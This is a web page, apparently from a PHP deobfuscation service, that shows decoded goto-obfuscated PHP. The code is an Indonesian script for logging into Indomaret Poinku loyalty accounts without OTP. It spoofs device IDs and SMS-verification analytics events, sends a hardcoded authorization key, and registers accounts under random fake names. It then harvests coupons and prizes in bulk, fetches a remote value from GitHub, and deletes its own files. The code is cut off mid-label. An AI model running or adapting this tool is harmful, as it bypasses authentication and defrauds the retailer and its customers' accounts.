Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?><?php $uuid = shell_exec("whoami"); $clear = shell_exec("clear"); echo $c..

Decoded Output download

<? ?><?php 
  $uuid = shell_exec("whoami"); 
  $clear = shell_exec("clear"); 
  echo $clear; 
  goto CFWEW; 
  s02R6: 
  goto k9jad; 
  goto VYZr6; 
  uXokT: 
  $ldzeo = @$owfHy["data"][$dQ8Tp]["subDistrict"]; 
  goto xloGc; 
  x7k_T: 
  if (!($yy9BI < $DxrJr)) { 
    goto wCiUR; 
  } 
  goto y7067; 
  W039g: 
  $zn5zd = $U0YgX; 
  goto zxkeE; 
  M4H3E: 
  f7coE: 
  goto n6abN; 
  qmkK5: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto kfZ6v; 
  HLOQc: 
  echo $jTEU0; 
  goto NF9qG; 
  Zr0sp: 
  zbRuM: 
  goto e1JPg; 
  ytCGQ: 
  echo @Zm6iC("purple", "Member ID : "); 
  goto KvSHm; 
  tmNUb: 
  echo @zM6Ic("nevy", "[3] {$eAEyy} \xa  > {$PEd4h} \xa
"); 
  goto h2hMj; 
  jn4R5: 
  dDvxi: 
  goto MxBPD; 
  Yj7KY: 
  $H1g60 = json_encode($IKJzx, true); 
  goto rouo1; 
  ShFpT: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","otp":"" . $hdCXp . "","deviceId":"" . $aY0el . ""}"; 
  goto TaSZC; 
  ElGmQ: 
  $ABmxY = @$nPb0z["message"]; 
  goto Y7Sve; 
  WL3hT: 
  w5u0B: 
  goto OZZQb; 
  h560o: 
  echo $jTEU0; 
  goto XgYhk; 
  oo0u7: 
  die; 
  goto VZLLC; 
  zZPco: 
  $OtngW = $eqo_P; 
  goto dGJoR; 
  hJjFO: 
  if ($Ia9Ix == "STATUS_WAIT_CODE") { 
    goto MGApE; 
  } 
  goto mvWXh; 
  zmvS8: 
  $earOL = $sONlZ; 
  goto AU3Y9; 
  TfY0U: 
  echo "\xa"; 
  goto TKtco; 
  IcyUK: 
  @unlink("/storage/emulated/0/Android/your"); 
  goto rbODu; 
  CPIBf: 
  $efQM2 = count($QRhbE) - 1; 
  goto Smrqq; 
  WiRh7: 
  $J0Fkh = @$owfHy["data"]["content"][$D2zwh]["quota"]; 
  goto zEG1z; 
  Lw8nc: 
  @unlink("poinhp.php"); 
  goto qy0y7; 
  m1yWR: 
  echo @Zm6IC("yellow", "[9] {$kkTa0} 
  > {$zV17j} 

"); 
  goto Nibkp; 
  nabnt: 
  echo @zm6ic("green", $LgiFv); 
  goto X8Xws; 
  i4D_W: 
  $BeKks = @$lImQC["data"]["content"][4]["couponName"]; 
  goto CpSYw; 
  BOyow: 
  KfEmL: 
  goto Ik2ui; 
  YzEEQ: 
  if (password_verify($Gukt8, $Jst1j)) { 
    goto aX9fj; 
  } 
  goto F_w9s; 
  hS2Td: 
  echo @ZM6ic("nevy", $YXsOG); 
  goto jmvmq; 
  dvyLA: 
  die; 
  goto Zr0sp; 
  jiC8F: 
  $pew2b = @$lImQC["data"]["content"][2]["couponName"]; 
  goto CS_fX; 
  G3G3e: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto IU21L; 
  EtLfU: 
  $kbWoT = @$lImQC["data"]["content"][6]["couponName"]; 
  goto XN9Lf; 
  oeXWG: 
  $xT15V = g8pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/", $aY0el, $GOXkU, $mlMLt); 
  goto dYDYD; 
  cSbKL: 
  PlP0m: 
  goto p9NyH; 
  QV7b_: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto HrweK; 
  HBaZy: 
  echo "\xa"; 
  goto W62An; 
  bBsji: 
  function zf9za($lEbop) 
  { 
    goto Bbq9a; 
    Bbq9a: 
    $C6npe = curl_init(); 
    goto hZKn9; 
    Eeq01: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto vLJjE; 
    igs59: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto w5IBj; 
    dBNc_: 
    return false; 
    goto lhHhx; 
    VWDiH: 
    return $ECuqv; 
    goto DY1VY; 
    hZKn9: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto lnnmH; 
    bz0w4: 
    $AXlcQ = json_decode($y7f11, true); 
    goto jwfiq; 
    WS1wn: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto uP62n; 
    wO2TC: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto WS1wn; 
    vLJjE: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto kKNwl; 
    P0ulG: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto hzUs4; 
    jwfiq: 
    print_r($AXlcQ); 
    goto VWDiH; 
    ibygb: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto qh8Gy; 
    sGEkZ: 
    kox8y: 
    goto dBNc_; 
    uP62n: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto Eeq01; 
    qh8Gy: 
    if (!$P7lm9) { 
      goto kox8y; 
    } 
    goto R2700; 
    kKNwl: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto kIZJD; 
    lhHhx: 
    gAWbF: 
    goto bz0w4; 
    hzUs4: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto wO2TC; 
    R2700: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto igs59; 
    lnnmH: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto P0ulG; 
    kIZJD: 
    $ECuqv = curl_exec($C6npe); 
    goto ibygb; 
    w5IBj: 
    goto gAWbF; 
    goto sGEkZ; 
    DY1VY: 
  } 
  goto bEj5j; 
  fa7Dr: 
  function u0ban($lEbop) 
  { 
    goto b5B_R; 
    n1LF1: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto boHQv; 
    VEcVY: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto ZKsEK; 
    YA2pt: 
    cj2w7: 
    goto FopzA; 
    On3VX: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto n1LF1; 
    ZIqRb: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto vUgbs; 
    oSdQI: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto ZIqRb; 
    FopzA: 
    $AXlcQ = json_decode($y7f11, true); 
    goto NQSQX; 
    vUgbs: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto iLLnM; 
    b5B_R: 
    $C6npe = curl_init(); 
    goto C8Cys; 
    rH6eT: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto zFfZZ; 
    boHQv: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto oSdQI; 
    fyLaj: 
    return $ECuqv; 
    goto dfKdo; 
    ZKsEK: 
    if (!$P7lm9) { 
      goto YbXsN; 
    } 
    goto jUuFK; 
    UYlTQ: 
    return false; 
    goto YA2pt; 
    C8Cys: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto On3VX; 
    jUuFK: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto jyKyU; 
    d6Dkv: 
    YbXsN: 
    goto UYlTQ; 
    jyKyU: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto ILlhR; 
    NQSQX: 
    print_r($AXlcQ); 
    goto fyLaj; 
    zFfZZ: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto LVk7H; 
    ILlhR: 
    goto cj2w7; 
    goto d6Dkv; 
    iLLnM: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto rH6eT; 
    LVk7H: 
    $ECuqv = curl_exec($C6npe); 
    goto VEcVY; 
    dfKdo: 
  } 
  goto NVl_i; 
  VUaXz: 
  echo @ZM6IC("red", "NOTICE !! : 
"); 
  goto xUip9; 
  UWuvP: 
  $nb9cm = round(microtime(true) * 1000); 
  goto sNEus; 
  VauNH: 
  echo @zM6IC("red", $D2zwh); 
  goto FsFpb; 
  L05Ik: 
  if (!($jTEU0 < $S8W9D)) { 
    goto YFIXZ; 
  } 
  goto Qd04P; 
  aDo3a: 
  die; 
  goto pcqM1; 
  Iv2S8: 
  GVUqX: 
  goto JXD87; 
  HqqQS: 
  goto iLHFy; 
  goto pw7cq; 
  mHTY8: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto BAhn6; 
  xHpep: 
  $lPULW = $m0f8X; 
  goto pFm9q; 
  w6iKL: 
  xbrV2: 
  goto y8VKP; 
  yPK1R: 
  echo @Zm6IC("nevy", $K4tCB); 
  goto vaWNC; 
  jrpYt: 
  WUJMe: 
  goto mfo7m; 
  knqmj: 
  echo "
"; 
  goto JO9PJ; 
  QHxK7: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto s4XZg; 
  wzo6j: 
  echo "\xa"; 
  goto ud_I2; 
  cubbE: 
  echo @zm6IC("nevy", $XDyMm); 
  goto A3oaD; 
  wxlya: 
  echo $BcbF3; 
  goto r_9O3; 
  EoL_9: 
  goto vCPy3; 
  goto hphe3; 
  eR0Md: 
  goto g2xJ9; 
  goto w73ga; 
  U8GHB: 
  if ($XDyMm == "1") { 
    goto piuRU; 
  } 
  goto DpEee; 
  BBtBz: 
  lYTFu: 
  goto CkDZ0; 
  TEHwa: 
  @unlink("poinhp.php"); 
  goto ZjDi9; 
  cYcM8: 
  qdNHN: 
  goto dOEwT; 
  j3Ixl: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/ms-homepage-layout/get-all-homepage-layout", $aY0el, $GOXkU, $mlMLt); 
  goto nL8vJ; 
  A7ytj: 
  Y1LJ5: 
  goto Nb0X4; 
  X5Mni: 
  echo @zm6IC("nevy", " | Script IDM LOGIN POINKU TANPA OTP
"); 
  goto vxPj3; 
  AUohZ: 
  $H1g60 = json_decode($yI7qh, true); 
  goto C9UeF; 
  Y6mvl: 
  function mHong($FK_yc, $bQedf, $Gk8zK) 
  { 
    goto voQPu; 
    cDEy3: 
    fputs($FhLCi, "{$bQedf} = {$Gk8zK}\xa"); 
    goto DswId; 
    DswId: 
    fclose($FhLCi); 
    goto CVgZV; 
    voQPu: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto cDEy3; 
    CVgZV: 
  } 
  goto MkOcE; 
  bHvhe: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto eeolX; 
  tBWs_: 
  die; 
  goto CnoX2; 
  C3e2F: 
  @unlink("poinhp.php"); 
  goto vZl5D; 
  ImlhV: 
  die; 
  goto G7Qw6; 
  F2_6S: 
  ADNin: 
  goto MQEh3; 
  kaG91: 
  @unlink("poinhp.php"); 
  goto beUFb; 
  X7SAF: 
  goto PRokP; 
  goto r0iPg; 
  mzjL3: 
  if (!($jTEU0 < $S8W9D)) { 
    goto FB07L; 
  } 
  goto qzh4E; 
  vXlUB: 
  $YXsOG = @$Ap1KM["message"]; 
  goto OWQhi; 
  m1O2o: 
  lcy0b: 
  goto hnMXZ; 
  Qgse8: 
  if (!($fUekS == '')) { 
    goto aaoBE; 
  } 
  goto aZAsM; 
  W5OtU: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto uEDKi; 
  S4WZq: 
  echo @zm6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto s9534; 
  NWybD: 
  $S8W9D = trim(fgets(STDIN)); 
  goto F0l4Y; 
  iaa8j: 
  if (!($yy9BI < $DxrJr)) { 
    goto lPFhp; 
  } 
  goto b8Z6e; 
  syFts: 
  m6VhL: 
  goto ufeHC; 
  M6siS: 
  sho4i: 
  goto DeaiS; 
  MCqL1: 
  $GOXkU = $w5ulg; 
  goto X73Ka; 
  kq9hY: 
  echo "Mulai Baris Ke : "; 
  goto tXal_; 
  w_yIX: 
  BGNon: 
  goto hTCB6; 
  UHSQH: 
  echo @Zm6iC("yellow", "ID nya: "); 
  goto WUD90; 
  PX6b2: 
  echo @ZM6iC("red", "Gagal, Mengambil Ulang Nomor..."); 
  goto H6_GJ; 
  hnEGN: 
  echo @zM6Ic("nevy", "Akun Ke    : "); 
  goto WNyMN; 
  rjVqC: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto zH0f9; 
  dOEwT: 
  if (!($fUekS == '')) { 
    goto KV6h2; 
  } 
  goto fFoJk; 
  Ck1_U: 
  $L1qpJ = @$owfHy["data"][$qtgR3]["district"]; 
  goto pkmY4; 
  x29nF: 
  if (!($fUekS == '')) { 
    goto q3ueI; 
  } 
  goto ZImQQ; 
  zFklN: 
  $u35jw = count($m0f8X) - 1; 
  goto oEEsC; 
  AAZZf: 
  $efQM2 = count($QRhbE) - 1; 
  goto hq7kH; 
  mBwSQ: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto MSqF0; 
  RM5B6: 
  echo "
"; 
  goto nmVJN; 
  nNr1Z: 
  echo @zm6ic("green", "Mau Tukar Produk Mana ? : "); 
  goto YNuST; 
  TiDu9: 
  $Pud0o = trim(file_get_contents("https://raw.githubusercontent.com/csaojkcsajcsjnjkscanjkncjkslnj/adfadfadvsgdfggfsgsgfsaf/main/makin")); 
  goto M0pcn; 
  dem36: 
  echo @zm6Ic("nevy", "Proses Verifikasi Device ID, Mohon Tunggu .."); 
  goto nE0JD; 
  nFrYj: 
  echo @zm6IC("yellow", "Kode Kuponnya  : "); 
  goto Zcbgi; 
  ozhcH: 
  Rhrij("Kupon Poinku new.txt", $zV17j); 
  goto Zv9qP; 
  mHZx1: 
  echo @Zm6Ic("green", "[8] {$z4sxX} \xa  > {$raN1z} 
\xa"); 
  goto m1yWR; 
  ejeA7: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto Wh127; 
  QPI07: 
  if (!($fUekS == '')) { 
    goto Z7aYS; 
  } 
  goto QFrmT; 
  rdASk: 
  @unlink("poinhp.php"); 
  goto nzGg7; 
  i5AD_: 
  echo "
"; 
  goto L6ZvK; 
  mJNk_: 
  echo $jTEU0; 
  goto fj_AT; 
  G8Xed: 
  FbwVq: 
  goto OwlK1; 
  b1QyZ: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto Ja0J8; 
  GIKee: 
  echo @ZM6Ic("nevy", " | Script IDM GENERATE BARCODE
"); 
  goto KOkWb; 
  mOFOa: 
  echo "\xa"; 
  goto sHluB; 
  eu_9w: 
  $p4iky = @$nPb0z["data"]["memberId"]; 
  goto qH6lQ; 
  l9zj0: 
  echo "Sampai Baris Ke : "; 
  goto x3nD5; 
  MKy2r: 
  $Gukt8 = $eqo_P; 
  goto YzEEQ; 
  p97HD: 
  echo "Sampai Baris Ke : "; 
  goto YLDiM; 
  muUMy: 
  @unlink("chace"); 
  goto LmE7p; 
  b61mZ: 
  $jTEU0; 
  goto HCxli; 
  c5Fn9: 
  echo @Zm6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto CcQD1; 
  sTIym: 
  zYvyA: 
  goto O4vBH; 
  M3PcJ: 
  @unlink("poinhp.php"); 
  goto x1zmG; 
  mcJlP: 
  Pn_38: 
  goto uqWGX; 
  vx_HS: 
  function Mp3kk($lEbop, $wDisp = null) 
  { 
    goto EDW_5; 
    x68Hi: 
    w3YVg: 
    goto zn4lr; 
    ctq95: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto w6FeH; 
    bzJtw: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto t9QR8; 
    BQG0q: 
    $ECuqv = curl_exec($C6npe); 
    goto RKach; 
    wBcD2: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto bzJtw; 
    EDW_5: 
    $C6npe = curl_init(); 
    goto lq4N3; 
    fYsgi: 
    return $ECuqv; 
    goto c80C7; 
    zn4lr: 
    $AXlcQ = json_decode($y7f11, true); 
    goto C0k9a; 
    th04s: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto ryYZI; 
    w6FeH: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto BQG0q; 
    NKxI1: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto XEvjR; 
    lq4N3: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto hVNG1; 
    CIbo6: 
    $ruc3h[] = "authorization: NNKSkTdooQo7vUGVG5eGkgYSVW7SabSjffafao35nfoan3ygfaa"; 
    goto th04s; 
    wdfSo: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto yeYmb; 
    n6JLi: 
    return false; 
    goto x68Hi; 
    ryYZI: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto wdfSo; 
    HEr9L: 
    M80Ly: 
    goto n6JLi; 
    uAlRq: 
    $ruc3h[] = "Host: asia-southeast2-idm-corp-prd.cloudfunctions.net"; 
    goto vW1dC; 
    XEvjR: 
    goto w3YVg; 
    goto HEr9L; 
    cPiSK: 
    if (!$P7lm9) { 
      goto M80Ly; 
    } 
    goto M3eAS; 
    yeYmb: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto ctq95; 
    t9QR8: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto uAlRq; 
    M3eAS: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto NKxI1; 
    RKach: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto cPiSK; 
    Pq9OA: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto wBcD2; 
    hVNG1: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto Pq9OA; 
    C0k9a: 
    print_r($AXlcQ); 
    goto fYsgi; 
    vW1dC: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto CIbo6; 
    c80C7: 
  } 
  goto FqbQV; 
  WDeTC: 
  @unlink("poinhp.php"); 
  goto swve1; 
  NI96b: 
  if ($ZNU2M == "Cashback 2.500 Poin") { 
    goto fblk0; 
  } 
  goto po2np; 
  utu6T: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto hnJzX; 
  VGfok: 
  $aY0el = $v1ZMX; 
  goto gQSHj; 
  X7D5K: 
  $tqWr2 = $zvt88[$jTEU0]; 
  goto DsKSR; 
  w0IcM: 
  $yy9BI; 
  goto H36MT; 
  iOY8b: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto WmLIs; 
  YIYeO: 
  aOh1Q: 
  goto KPFhC; 
  Y7Sve: 
  $kp_uF = @$nPb0z["data"]["isNewRegister"]; 
  goto S6BIV; 
  Ga713: 
  @unlink("poinhp.php"); 
  goto o2TKk; 
  ke5o4: 
  function yrz3j($lEbop, $aY0el, $GOXkU) 
  { 
    goto FyHRb; 
    eyZfR: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto ihJqq; 
    RirJI: 
    xoT9Q: 
    goto zMOXf; 
    q6SnL: 
    print_r($AXlcQ); 
    goto qdB7x; 
    XCGnp: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto cDQmT; 
    Pg6_j: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto yZ1mN; 
    FKuup: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto XCGnp; 
    e4hPU: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto ZPMqb; 
    cDQmT: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto l5UG1; 
    ZPMqb: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto KDrIK; 
    KDrIK: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto fb4EW; 
    tlyx_: 
    goto xoT9Q; 
    goto Bcjwj; 
    sL9Nc: 
    if (!$P7lm9) { 
      goto cJnpK; 
    } 
    goto Pg6_j; 
    MrJZd: 
    return false; 
    goto RirJI; 
    P_dFs: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto FpWfX; 
    aRizd: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto eyZfR; 
    qdB7x: 
    return $ECuqv; 
    goto BEuf0; 
    Wj23N: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto sL9Nc; 
    FyHRb: 
    $C6npe = curl_init(); 
    goto e4hPU; 
    FpWfX: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto FKuup; 
    ihJqq: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto P_dFs; 
    yZ1mN: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto tlyx_; 
    l5UG1: 
    $ECuqv = curl_exec($C6npe); 
    goto Wj23N; 
    fb4EW: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto aRizd; 
    zMOXf: 
    $AXlcQ = json_decode($y7f11, true); 
    goto q6SnL; 
    Bcjwj: 
    cJnpK: 
    goto MrJZd; 
    BEuf0: 
  } 
  goto If3cN; 
  bQ3QD: 
  echo "
"; 
  goto veYsp; 
  qPkmL: 
  echo @ZM6ic("nevy", "Masukkan API Key Mu : "); 
  goto t4a2M; 
  TRBQ4: 
  goto fZnQ2; 
  goto A7ytj; 
  i9Vur: 
  PSckK: 
  goto juo3c; 
  qovaZ: 
  $mlMLt = $obc_G; 
  goto UDuJL; 
  a0DWl: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto AWPnd; 
  h9vq8: 
  GWmgR: 
  goto Nz3YB; 
  FhaVw: 
  die; 
  goto PPwSO; 
  RGbnB: 
  $yy9BI = "0"; 
  goto QDAIS; 
  RU4S9: 
  if (!($IBJ55 == '')) { 
    goto CAy8f; 
  } 
  goto IcyUK; 
  JeqGb: 
  CQ2mu: 
  goto XMS9r; 
  arWms: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"failed_reason":"Success SMS Verification","event_label":"verification","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto XxnqS; 
  p3xdC: 
  die; 
  goto wjJ6w; 
  kMWxV: 
  echo "
"; 
  goto zwaNA; 
  cQgXr: 
  echo "\xa"; 
  goto oCGJ7; 
  la72U: 
  goto xh261; 
  goto oICIz; 
  NVl_i: 
  function WY7iI() 
  { 
    goto TTMdB; 
    TTMdB: 
    $C6npe = curl_init(); 
    goto b5sWV; 
    P4dtW: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYHOST, 0); 
    goto q9bzj; 
    sbEbS: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, 1); 
    goto SOECe; 
    q9bzj: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto sbEbS; 
    SOECe: 
    $oYSb9 = curl_exec($C6npe); 
    goto i8UX6; 
    R94cH: 
    return $ZXjwY[2][mt_rand(0, 14)]; 
    goto TKVt9; 
    aTYyU: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto P4dtW; 
    i8UX6: 
    preg_match_all("~(\xe2\200\xa2 (.*?)<br/>\xe2\x80\242 )~", $oYSb9, $ZXjwY); 
    goto R94cH; 
    b5sWV: 
    curl_setopt($C6npe, CURLOPT_URL, "http://ninjaname.horseridersupply.com/indonesian_name.php"); 
    goto aTYyU; 
    TKVt9: 
  } 
  goto x5btj; 
  cnUbl: 
  echo "\xa"; 
  goto AQXMs; 
  LGOHq: 
  @unlink("poinhp.php"); 
  goto Sgp3W; 
  soYFB: 
  dGfMJ: 
  goto d32UI; 
  v0lAt: 
  goto AGZdm; 
  goto t3iAT; 
  OWQFJ: 
  echo "\xa"; 
  goto VPytH; 
  vdihH: 
  wB2V7: 
  goto pNRYy; 
  zf8Zf: 
  $wDisp = "{"address":"" . $hGkCN . "","addressName":"Rumah","district":{"city":" . $JrTpE . ","cityName":"" . $b2ucB . "","district":" . $L1qpJ . ","districtName":"" . $yJiD4 . "","keyword":"" . $ZqwwP . "","province":" . $Ipl73 . ","provinceName":"" . $K4tCB . ""},"id":0,"isPrimary":false,"postalCode":{"postalCode":"" . $Bz8Et . "","postalCodeId":"" . $pugmZ . ""},"recipientEmail":"" . $z6UZd . "","recipientName":"" . $m_IIo . "","recipientPhoneNumber":"" . $qFy6r . "","subDistrict":{"subDistrict":"" . $ldzeo . "","subDistrictCode":"" . $U_EVz . "","value":"" . $xzAuu . ""}}"; 
  goto mHcF1; 
  zEG1z: 
  $yWjvE = @$owfHy["data"]["content"][$D2zwh]["usedQuota"]; 
  goto W3gKn; 
  uKX_I: 
  $S8W9D = trim(fgets(STDIN)); 
  goto b61mZ; 
  KPFhC: 
  if (!($yy9BI < $DxrJr)) { 
    goto BGNon; 
  } 
  goto ZLXD4; 
  vUkxr: 
  echo "\xa"; 
  goto vydVo; 
  nmqsG: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto O1aXH; 
  JpUFi: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto VnEev; 
  T96NA: 
  $YXsOG = @$Ap1KM["message"]; 
  goto EgQkD; 
  QzPor: 
  echo @ZM6IC("nevy", " | Script IDM LOGIN POINKU TANPA OTP
"); 
  goto g8swJ; 
  IF799: 
  echo @zm6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto VLriK; 
  rMiHp: 
  $zcN5u = XOZB4(array("|"), $wZnHP)[0]; 
  goto ypXdS; 
  b8xnZ: 
  echo @zm6IC("green", "Nomor HP Anda : "); 
  goto CX3Ha; 
  Rw6sZ: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto TlphE; 
  UOMa8: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto al2pj; 
  pUl6i: 
  $KOeAA = @$Ap1KM["data"]["rewards"][0]["item"][0]["couponMasterId"]; 
  goto STwv9; 
  IgHJm: 
  if (!($fUekS == '')) { 
    goto bLHjw; 
  } 
  goto bD9yR; 
  EtgZF: 
  thh3I: 
  goto HU3Jb; 
  AHUHW: 
  goto Q7LGl; 
  goto FHmCL; 
  AJIdw: 
  QcsI1: 
  goto riEyv; 
  W62An: 
  $upOL9 = G8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto F38ui; 
  ty2v1: 
  $yy9BI; 
  goto ldlWE; 
  OJe7J: 
  RhRij("Kupon Poinku new.txt", $Q8u1Y); 
  goto NXRyP; 
  CZ_oJ: 
  $CdOss = "10000000"; 
  goto Wlx0i; 
  Gfs_c: 
  echo "Error deleting {$xp_1p} "; 
  goto w09r9; 
  MHKcM: 
  $xT15V = G8PF2("https://edtsapp.indomaretpoinku.com/%2Floyalty%2Fapix-1502-api%2Fmobile%2Fcoins%2Fprizes%2FGOFRESH2022%2Fme", $aY0el, $GOXkU, $mlMLt); 
  goto LqNGf; 
  P3s5s: 
  goto piuvy; 
  goto Syh5j; 
  mPz3m: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"activity_details":"resume_app","event_name":"app_activity","event_timestamp":" . $nb9cm . "},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto oQe5O; 
  xhOCn: 
  die; 
  goto btn19; 
  HNP2O: 
  if (!($cPDPt == 1)) { 
    goto alr8L; 
  } 
  goto emTau; 
  UhQTr: 
  if (!($D2zwh < $ogbF4)) { 
    goto PG5CP; 
  } 
  goto CSrk4; 
  gZeD3: 
  $N0XGD = G8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto RnlCl; 
  kOQHI: 
